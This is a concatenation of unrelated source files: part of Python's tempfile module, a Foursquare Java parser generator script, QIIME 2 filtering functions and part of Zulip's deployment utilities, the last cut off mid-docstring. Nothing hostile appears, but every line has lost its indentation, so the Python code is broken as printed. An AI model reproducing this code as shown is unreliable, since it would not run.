if dir != _os.curdir:
dir = _os.path.abspath(dir)
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
break # no point trying more names in this directory
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
"""Common setup sequence for all user-callable interfaces."""
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags, output_type):
"""Code common to mkstemp, TemporaryFile, and NamedTemporaryFile."""
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return (fd, _os.path.abspath(file))
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
"""The default prefix for temporary directories."""
return template
def gettempprefixb():
"""The default prefix for temporary directories as bytes."""
return _os.fsencode(gettempprefix())
tempdir = None
def gettempdir():
"""Accessor for tempfile.tempdir."""
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def gettempdirb():
"""A bytes version of tempfile.gettempdir()."""
return _os.fsencode(gettempdir())
def mkstemp(suffix=None, prefix=None, dir=None, text=False):
"""User-callable function to create and return a unique temporary
file. The return value is a pair (fd, name) where fd is the
file descriptor returned by os.open, and name is the filename.
If 'suffix' is specified, the file name will end with that suffix,
otherwise there will be no suffix.
If 'prefix' is specified, the file name will begin with that prefix,
otherwise a default prefix is used.
If 'dir' is specified, the file will be created in that directory,
otherwise a default directory is used.
If 'text' is specified and true, the file is opened in text
mode. Else (the default) the file is opened in binary mode. On
some operating systems, this makes no difference.
suffix, prefix and dir must all contain the same type if specified.
If they are bytes, the returned name will be bytes; str otherwise.
A value of None will cause an appropriate default to be used.
The file is readable and writable only by the creating user ID.
If the operating system uses permission bits to indicate whether a
file is executable, the file is executable by no one. The file
descriptor is not inherited by children of this process.
Caller is responsible for deleting the file when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags, output_type)
def mkdtemp(suffix=None, prefix=None, dir=None):
"""User-callable function to create and return a unique temporary
directory. The return value is the pathname of the directory.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
The directory is readable, writable, and searchable only by the
creating user.
Caller is responsible for deleting the directory when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
"""User-callable function to return a unique temporary file name. The
file is not created.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
THIS FUNCTION IS UNSAFE AND SHOULD NOT BE USED. The file name may
refer to a file that did not exist at some point, but by the time
you get around to creating it, someone else may have beaten you to
the punch.
"""
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileCloser:
"""A separate object allowing proper closing of a temporary file's
underlying file object, without adding a __del__ method to the
temporary file."""
file = None # Set here since __del__ checks it
close_called = False
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
# NT provides delete-on-close as a primitive, so we don't need
# the wrapper to do anything special. We still use it so that
# file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt' and _os.name != 'uwp_os':
# Cache the unlinker so we don't get spurious errors at
# shutdown when the module-level "os" is None'd out. Note
# that this must be referenced as self.unlink, because the
# name TemporaryFileWrapper may also get None'd out before
# __del__ is called.
def close(self, unlink=_os.unlink):
if not self.close_called and self.file is not None:
self.close_called = True
try:
self.file.close()
finally:
if self.delete:
unlink(self.name)
# Need to ensure the file is deleted on __del__
def __del__(self):
self.close()
else:
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
class _TemporaryFileWrapper:
"""Temporary file wrapper
This class provides a wrapper around files opened for
temporary use. In particular, it seeks to automatically
remove the file when it is no longer needed.
"""
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
self._closer = _TemporaryFileCloser(file, name, delete)
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if hasattr(a, '__call__'):
func = a
@_functools.wraps(func)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
# Avoid closing the file as long as the wrapper is alive,
# see issue #18879.
func_wrapper._closer = self._closer
a = func_wrapper
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
def close(self):
"""
Close the temporary file, possibly deleting it.
"""
self._closer.close()
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
# Don't return iter(self.file), but yield from it to avoid closing
# file as long as it's being used as iterator (see issue #23700). We
# can't use 'yield from' here because iter(file) returns the file
# object itself, which has a close method, and thus the file would get
# closed when the generator is finalized, due to PEP380 semantics.
for line in self.file:
yield line
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None, delete=True):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
'delete' -- whether the file is deleted on close (default True).
The file is created as mkstemp() would do it.
Returns an object with a file-like interface; the name of the file
is accessible as file.name. The file will be automatically deleted
when it is closed unless the 'delete' argument is set to False.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if (_os.name == 'nt' or _os.name == 'uwp_os') and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
except Exception:
_os.close(fd)
raise
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
# Is the O_TMPFILE flag available and does it work?
# The flag is set to False if os.open(dir, os.O_TMPFILE) raises an
# IsADirectoryError exception
_O_TMPFILE_WORKS = hasattr(_os, 'O_TMPFILE')
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
global _O_TMPFILE_WORKS
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
if _O_TMPFILE_WORKS:
try:
flags2 = (flags | _os.O_TMPFILE) & ~_os.O_CREAT
fd = _os.open(dir, flags2, 0o600)
except IsADirectoryError:
# Linux kernel older than 3.11 ignores O_TMPFILE flag.
# Set flag to False to not try again.
_O_TMPFILE_WORKS = False
except OSError:
# The filesystem of the directory does not support O_TMPFILE.
# For example, OSError(95, 'Operation not supported').
pass
else:
try:
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
# Fallback to _mkstemp_inner().
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
"""Temporary file wrapper, specialized to switch from BytesIO
or StringIO to a real file when it exceeds a certain size or
when a fileno is needed.
"""
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix=None, prefix=None, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
# get double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# The method caching trick from NamedTemporaryFile
# won't work here, because _file may change from a
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix=None, prefix=None, dir=None):
self.name = mkdtemp(suffix, prefix, dir)
self._finalizer = _weakref.finalize(
self, self._cleanup, self.name,
warn_message="Implicitly cleaning up {!r}".format(self))
@classmethod
def _cleanup(cls, name, warn_message):
_shutil.rmtree(name)
_warnings.warn(warn_message, ResourceWarning)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def __exit__(self, exc, value, tb):
self.cleanup()
def cleanup(self):
if self._finalizer.detach():
_shutil.rmtree(self.name)
|
#!/usr/bin/python
import datetime
import sys
import textwrap
import common
from xml.dom import pulldom
PARSER = """\
/**
* Copyright 2009 Joe LaPenna
*/
package com.joelapenna.foursquare.parsers;
import com.joelapenna.foursquare.Foursquare;
import com.joelapenna.foursquare.error.FoursquareError;
import com.joelapenna.foursquare.error.FoursquareParseException;
import com.joelapenna.foursquare.types.%(type_name)s;
import org.xmlpull.v1.XmlPullParser;
import org.xmlpull.v1.XmlPullParserException;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
/**
* Auto-generated: %(timestamp)s
*
* @author Joe LaPenna (joe@joelapenna.com)
* @param <T>
*/
public class %(type_name)sParser extends AbstractParser<%(type_name)s> {
private static final Logger LOG = Logger.getLogger(%(type_name)sParser.class.getCanonicalName());
private static final boolean DEBUG = Foursquare.PARSER_DEBUG;
@Override
public %(type_name)s parseInner(XmlPullParser parser) throws XmlPullParserException, IOException,
FoursquareError, FoursquareParseException {
parser.require(XmlPullParser.START_TAG, null, null);
%(type_name)s %(top_node_name)s = new %(type_name)s();
while (parser.nextTag() == XmlPullParser.START_TAG) {
String name = parser.getName();
%(stanzas)s
} else {
// Consume something we don't understand.
if (DEBUG) LOG.log(Level.FINE, "Found tag that we don't recognize: " + name);
skipSubTree(parser);
}
}
return %(top_node_name)s;
}
}"""
BOOLEAN_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(Boolean.valueOf(parser.nextText()));
"""
GROUP_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new GroupParser(new %(sub_parser_camel_case)s()).parse(parser));
"""
COMPLEX_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new %(parser_name)s().parse(parser));
"""
STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(parser.nextText());
"""
def main():
type_name, top_node_name, attributes = common.WalkNodesForAttributes(
sys.argv[1])
GenerateClass(type_name, top_node_name, attributes)
def GenerateClass(type_name, top_node_name, attributes):
"""generate it.
type_name: the type of object the parser returns
top_node_name: the name of the object the parser returns.
per common.WalkNodsForAttributes
"""
stanzas = []
for name in sorted(attributes):
typ, children = attributes[name]
replacements = Replacements(top_node_name, name, typ, children)
if typ == common.BOOLEAN:
stanzas.append(BOOLEAN_STANZA % replacements)
elif typ == common.GROUP:
stanzas.append(GROUP_STANZA % replacements)
elif typ in common.COMPLEX:
stanzas.append(COMPLEX_STANZA % replacements)
else:
stanzas.append(STANZA % replacements)
if stanzas:
# pop off the extranious } else for the first conditional stanza.
stanzas[0] = stanzas[0].replace('} else ', '', 1)
replacements = Replacements(top_node_name, name, typ, [None])
replacements['stanzas'] = '\n'.join(stanzas).strip()
print PARSER % replacements
def Replacements(top_node_name, name, typ, children):
# CameCaseClassName
type_name = ''.join([word.capitalize() for word in top_node_name.split('_')])
# CamelCaseClassName
camel_name = ''.join([word.capitalize() for word in name.split('_')])
# camelCaseLocalName
attribute_name = camel_name.lower().capitalize()
# mFieldName
field_name = 'm' + camel_name
if children[0]:
sub_parser_camel_case = children[0] + 'Parser'
else:
sub_parser_camel_case = (camel_name[:-1] + 'Parser')
return {
'type_name': type_name,
'name': name,
'top_node_name': top_node_name,
'camel_name': camel_name,
'parser_name': typ + 'Parser',
'attribute_name': attribute_name,
'field_name': field_name,
'typ': typ,
'timestamp': datetime.datetime.now(),
'sub_parser_camel_case': sub_parser_camel_case,
'sub_type': children[0]
}
if __name__ == '__main__':
main()
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import biom
import qiime2
import numpy as np
import pandas as pd
def _get_biom_filter_function(ids_to_keep, min_frequency, max_frequency,
min_nonzero, max_nonzero):
ids_to_keep = set(ids_to_keep)
if max_frequency is None:
max_frequency = np.inf
if max_nonzero is None:
max_nonzero = np.inf
def f(data_vector, id_, metadata):
return (id_ in ids_to_keep) and \
(min_frequency <= data_vector.sum() <= max_frequency) and \
(min_nonzero <= (data_vector > 0).sum() <= max_nonzero)
return f
_other_axis_map = {'sample': 'observation', 'observation': 'sample'}
def _filter_table(table, min_frequency, max_frequency, min_nonzero,
max_nonzero, metadata, where, axis, exclude_ids=False):
if min_frequency == 0 and max_frequency is None and min_nonzero == 0 and\
max_nonzero is None and metadata is None and where is None and\
exclude_ids is False:
raise ValueError("No filtering was requested.")
if metadata is None and where is not None:
raise ValueError("Metadata must be provided if 'where' is "
"specified.")
if metadata is None and exclude_ids is True:
raise ValueError("Metadata must be provided if 'exclude_ids' "
"is True.")
if metadata is not None:
ids_to_keep = metadata.get_ids(where=where)
else:
ids_to_keep = table.ids(axis=axis)
if exclude_ids is True:
ids_to_keep = set(table.ids(axis=axis)) - set(ids_to_keep)
filter_fn1 = _get_biom_filter_function(
ids_to_keep, min_frequency, max_frequency, min_nonzero, max_nonzero)
table.filter(filter_fn1, axis=axis, inplace=True)
# filter on the opposite axis to remove any entities that now have a
# frequency of zero
filter_fn2 = _get_biom_filter_function(
ids_to_keep=table.ids(axis=_other_axis_map[axis]), min_frequency=0,
max_frequency=None, min_nonzero=1, max_nonzero=None)
table.filter(filter_fn2, axis=_other_axis_map[axis], inplace=True)
def filter_samples(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_features: int = 0,
max_features: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_features,
max_nonzero=max_features, metadata=metadata,
where=where, axis='sample', exclude_ids=exclude_ids)
return table
def filter_features(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_samples: int = 0,
max_samples: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_samples,
max_nonzero=max_samples, metadata=metadata,
where=where, axis='observation', exclude_ids=exclude_ids)
return table
def filter_seqs(data: pd.Series, table: biom.Table = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False) -> pd.Series:
if table is not None and metadata is not None:
raise ValueError('Filtering with metadata and filtering with a table '
'are mutually exclusive.')
elif table is None and metadata is None:
raise ValueError('No filtering requested. Must provide either table '
'or metadata.')
elif table is not None:
ids_to_keep = table.ids(axis='observation')
else:
# Note, no need to check for missing feature IDs in the metadata,
# because that is basically the point of this method.
ids_to_keep = metadata.get_ids(where=where)
if exclude_ids is True:
ids_to_keep = set(data.index) - set(ids_to_keep)
filtered = data[data.index.isin(ids_to_keep)]
if filtered.empty is True:
raise ValueError('All features were filtered out of the data.')
return filtered
|
#!/usr/bin/env python3
import argparse
import configparser
import datetime
import functools
import hashlib
import json
import logging
import os
import pwd
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import uuid
from typing import Any, Dict, List, Sequence, Set
from urllib.parse import SplitResult
DEPLOYMENTS_DIR = "/home/zulip/deployments"
LOCK_DIR = os.path.join(DEPLOYMENTS_DIR, "lock")
TIMESTAMP_FORMAT = '%Y-%m-%d-%H-%M-%S'
# Color codes
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BLACKONYELLOW = '\x1b[0;30;43m'
WHITEONRED = '\x1b[0;37;41m'
BOLDRED = '\x1B[1;31m'
GREEN = '\x1b[32m'
YELLOW = '\x1b[33m'
BLUE = '\x1b[34m'
MAGENTA = '\x1b[35m'
CYAN = '\x1b[36m'
def overwrite_symlink(src: str, dst: str) -> None:
dir, base = os.path.split(dst)
while True:
# Note: creating a temporary filename like this is not generally
# secure. Itβs fine in this case because os.symlink refuses to
# overwrite an existing target; we handle the error and try again.
tmp = os.path.join(dir, ".{}.{:010x}".format(base, random.randrange(1 << 40)))
try:
os.symlink(src, tmp)
except FileExistsError:
continue
break
try:
os.rename(tmp, dst)
except Exception:
os.remove(tmp)
raise
def parse_cache_script_args(description: str) -> argparse.Namespace:
# Keep this in sync with clean_unused_caches in provision_inner.py
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--threshold", dest="threshold_days", type=int, default=14,
metavar="<days>", help="Any cache which is not in "
"use by a deployment not older than threshold days(current "
"installation in dev) and older than threshold days will be "
"deleted. (defaults to 14)")
parser.add_argument(
"--dry-run", action="store_true",
help="If specified then script will only print the caches "
"that it will delete/keep back. It will not delete any cache.")
parser.add_argument(
"--verbose", action="store_true",
help="If specified then script will print a detailed report "
"of what is being will deleted/kept back.")
parser.add_argument(
"--no-print-headings", dest="no_headings", action="store_true",
help="If specified then script will not print headings for "
"what will be deleted/kept back.")
args = parser.parse_args()
args.verbose |= args.dry_run # Always print a detailed report in case of dry run.
return args
def get_deploy_root() -> str:
return os.path.realpath(
os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")),
)
def get_deployment_version(extract_path: str) -> str:
version = '0.0.0'
for item in os.listdir(extract_path):
item_path = os.path.join(extract_path, item)
if item.startswith('zulip-server') and os.path.isdir(item_path):
with open(os.path.join(item_path, 'version.py')) as f:
result = re.search('ZULIP_VERSION = "(.*)"', f.read())
if result:
version = result.groups()[0]
break
return version
def is_invalid_upgrade(current_version: str, new_version: str) -> bool:
if new_version > '1.4.3' and current_version <= '1.3.10':
return True
return False
def subprocess_text_output(args: Sequence[str]) -> str:
return subprocess.check_output(args, universal_newlines=True).strip()
def get_zulip_pwent() -> pwd.struct_passwd:
deploy_root_uid = os.stat(get_deploy_root()).st_uid
if deploy_root_uid != 0:
return pwd.getpwuid(deploy_root_uid)
# In the case that permissions got messed up and the deployment
# directory is unexpectedly owned by root, we fallback to the
# `zulip` user as that's the correct value in production.
return pwd.getpwnam("zulip")
def get_postgres_pwent() -> pwd.struct_passwd:
try:
return pwd.getpwnam("postgres")
except KeyError:
return get_zulip_pwent()
def su_to_zulip(save_suid: bool = False) -> None:
"""Warning: su_to_zulip assumes that the zulip checkout is owned by
the zulip user (or whatever normal user is running the Zulip
installation). It should never be run from the installer or other
production contexts before /home/zulip/deployments/current is
created."""
pwent = get_zulip_pwent()
os.setgid(pwent.pw_gid)
if save_suid:
os.setresuid(pwent.pw_uid, pwent.pw_uid, os.getuid())
else:
os.setuid(pwent.pw_uid)
os.environ['HOME'] = pwent.pw_dir
def make_deploy_path() -> str:
timestamp = datetime.datetime.now().strftime(TIMESTAMP_FORMAT)
return os.path.join(DEPLOYMENTS_DIR, timestamp)
TEMPLATE_DATABASE_DIR = "test-backend/databases"
def get_dev_uuid_var_path(create_if_missing: bool = False) -> str:
zulip_path = get_deploy_root()
uuid_path = os.path.join(os.path.realpath(os.path.dirname(zulip_path)), ".zulip-dev-uuid")
if os.path.exists(uuid_path):
with open(uuid_path) as f:
zulip_uuid = f.read().strip()
else:
if create_if_missing:
zulip_uuid = str(uuid.uuid4())
# We need root access here, since the path will be under /srv/ in the
# development environment.
run_as_root(["sh", "-c", 'echo "$1" > "$2"', "-",
zulip_uuid, uuid_path])
else:
raise AssertionError("Missing UUID file; please run tools/provision!")
result_path = os.path.join(zulip_path, "var", zulip_uuid)
os.makedirs(result_path, exist_ok=True)
return result_path
def get_deployment_lock(error_rerun_script: str) -> None:
start_time = time.time()
got_lock = False
while time.time() - start_time < 300:
try:
os.mkdir(LOCK_DIR)
got_lock = True
break
except OSError:
print(WARNING + "Another deployment in progress; waiting for lock... " +
"(If no deployment is running, rmdir {})".format(LOCK_DIR) + ENDC)
sys.stdout.flush()
time.sleep(3)
if not got_lock:
print(FAIL + "Deployment already in progress. Please run\n" +
" {}\n".format(error_rerun_script) +
"manually when the previous deployment finishes, or run\n" +
" rmdir {}\n".format(LOCK_DIR) +
"if the previous deployment crashed." +
ENDC)
sys.exit(1)
def release_deployment_lock() -> None:
shutil.rmtree(LOCK_DIR)
def run(args: Sequence[str], **kwargs: Any) -> None:
# Output what we're doing in the `set -x` style
print("+ {}".format(" ".join(map(shlex.quote, args))))
try:
subprocess.check_call(args, **kwargs)
except subprocess.CalledProcessError:
print()
print(WHITEONRED + "Error running a subcommand of {}: {}".format(
sys.argv[0], " ".join(map(shlex.quote, args)),
) + ENDC)
print(WHITEONRED + "Actual error output for the subcommand is just above this." +
ENDC)
print()
raise
def log_management_command(cmd: str, log_path: str) -> None:
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
formatter = logging.Formatter("%(asctime)s: %(message)s")
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
logger = logging.getLogger("zulip.management")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Ran '%s'", cmd)
def get_environment() -> str:
if os.path.exists(DEPLOYMENTS_DIR):
return "prod"
return "dev"
def get_recent_deployments(threshold_days: int) -> Set[str]:
# Returns a list of deployments not older than threshold days
# including `/root/zulip` directory if it exists.
recent = set()
threshold_date = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
for dir_name in os.listdir(DEPLOYMENTS_DIR):
target_dir = os.path.join(DEPLOYMENTS_DIR, dir_name)
if not os.path.isdir(target_dir):
# Skip things like uwsgi sockets, symlinks, etc.
continue
if not os.path.exists(os.path.join(target_dir, "zerver")):
# Skip things like "lock" that aren't actually a deployment directory
continue
try:
date = datetime.datetime.strptime(dir_name, TIMESTAMP_FORMAT)
if date >= threshold_date:
recent.add(target_dir)
except ValueError:
# Always include deployments whose name is not in the format of a timestamp.
recent.add(target_dir)
# If it is a symlink then include the target as well.
if os.path.islink(target_dir):
recent.add(os.path.realpath(target_dir))
if os.path.exists("/root/zulip"):
recent.add("/root/zulip")
return recent
def get_threshold_timestamp(threshold_days: int) -> int:
# Given number of days, this function returns timestamp corresponding
# to the time prior to given number of days.
threshold = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
threshold_timestamp = int(time.mktime(threshold.utctimetuple()))
return threshold_timestamp
def get_caches_to_be_purged(caches_dir: str, caches_in_use: Set[str], threshold_days: int) -> Set[str]:
# Given a directory containing caches, a list of caches in use
# and threshold days, this function return a list of caches
# which can be purged. Remove the cache only if it is:
# 1: Not in use by the current installation(in dev as well as in prod).
# 2: Not in use by a deployment not older than `threshold_days`(in prod).
# 3: Not in use by '/root/zulip'.
# 4: Not older than `threshold_days`.
caches_to_purge = set()
threshold_timestamp = get_threshold_timestamp(threshold_days)
for cache_dir_base in os.listdir(caches_dir):
cache_dir = os.path.join(caches_dir, cache_dir_base)
if cache_dir in caches_in_use:
# Never purge a cache which is in use.
continue
if os.path.getctime(cache_dir) < threshold_timestamp:
caches_to_purge.add(cache_dir)
return caches_to_purge
def purge_unused_caches(
caches_dir: str, caches_in_use: Set[str], cache_type: str, args: argparse.Namespace,
) -> None:
all_caches = {os.path.join(caches_dir, cache) for cache in os.listdir(caches_dir)}
caches_to_purge = get_caches_to_be_purged(caches_dir, caches_in_use, args.threshold_days)
caches_to_keep = all_caches - caches_to_purge
may_be_perform_purging(
caches_to_purge, caches_to_keep, cache_type, args.dry_run, args.verbose, args.no_headings)
if args.verbose:
print("Done!")
def generate_sha1sum_emoji(zulip_path: str) -> str:
sha = hashlib.sha1()
filenames = [
'static/assets/zulip-emoji/zulip.png',
'tools/setup/emoji/emoji_map.json',
'tools/setup/emoji/build_emoji',
'tools/setup/emoji/emoji_setup_utils.py',
'tools/setup/emoji/emoji_names.py',
]
for filename in filenames:
file_path = os.path.join(zulip_path, filename)
with open(file_path, 'rb') as reader:
sha.update(reader.read())
# Take into account the version of `emoji-datasource-google` package
# while generating success stamp.
PACKAGE_FILE_PATH = os.path.join(zulip_path, 'package.json')
with open(PACKAGE_FILE_PATH) as fp:
parsed_package_file = json.load(fp)
dependency_data = parsed_package_file['dependencies']
if 'emoji-datasource-google' in dependency_data:
with open(os.path.join(zulip_path, "yarn.lock")) as fp:
(emoji_datasource_version,) = re.findall(
r"^emoji-datasource-google@"
+ re.escape(dependency_data["emoji-datasource-google"])
+ r':\n version "(.*)"',
fp.read(),
re.M,
)
else:
emoji_datasource_version = "0"
sha.update(emoji_datasource_version.encode())
return sha.hexdigest()
def may_be_perform_purging(
dirs_to_purge: Set[str],
dirs_to_keep: Set[str],
dir_type: str,
dry_run: bool,
verbose: bool,
no_headings: bool,
) -> None:
if dry_run:
print("Performing a dry run...")
if not no_headings:
print("Cleaning unused {}s...".format(dir_type))
for directory in dirs_to_purge:
if verbose:
print("Cleaning unused {}: {}".format(dir_type, directory))
if not dry_run:
run_as_root(["rm", "-rf", directory])
for directory in dirs_to_keep:
if verbose:
print("Keeping used {}: {}".format(dir_type, directory))
@functools.lru_cache(None)
def parse_os_release() -> Dict[str, str]:
"""
Example of the useful subset of the data:
{
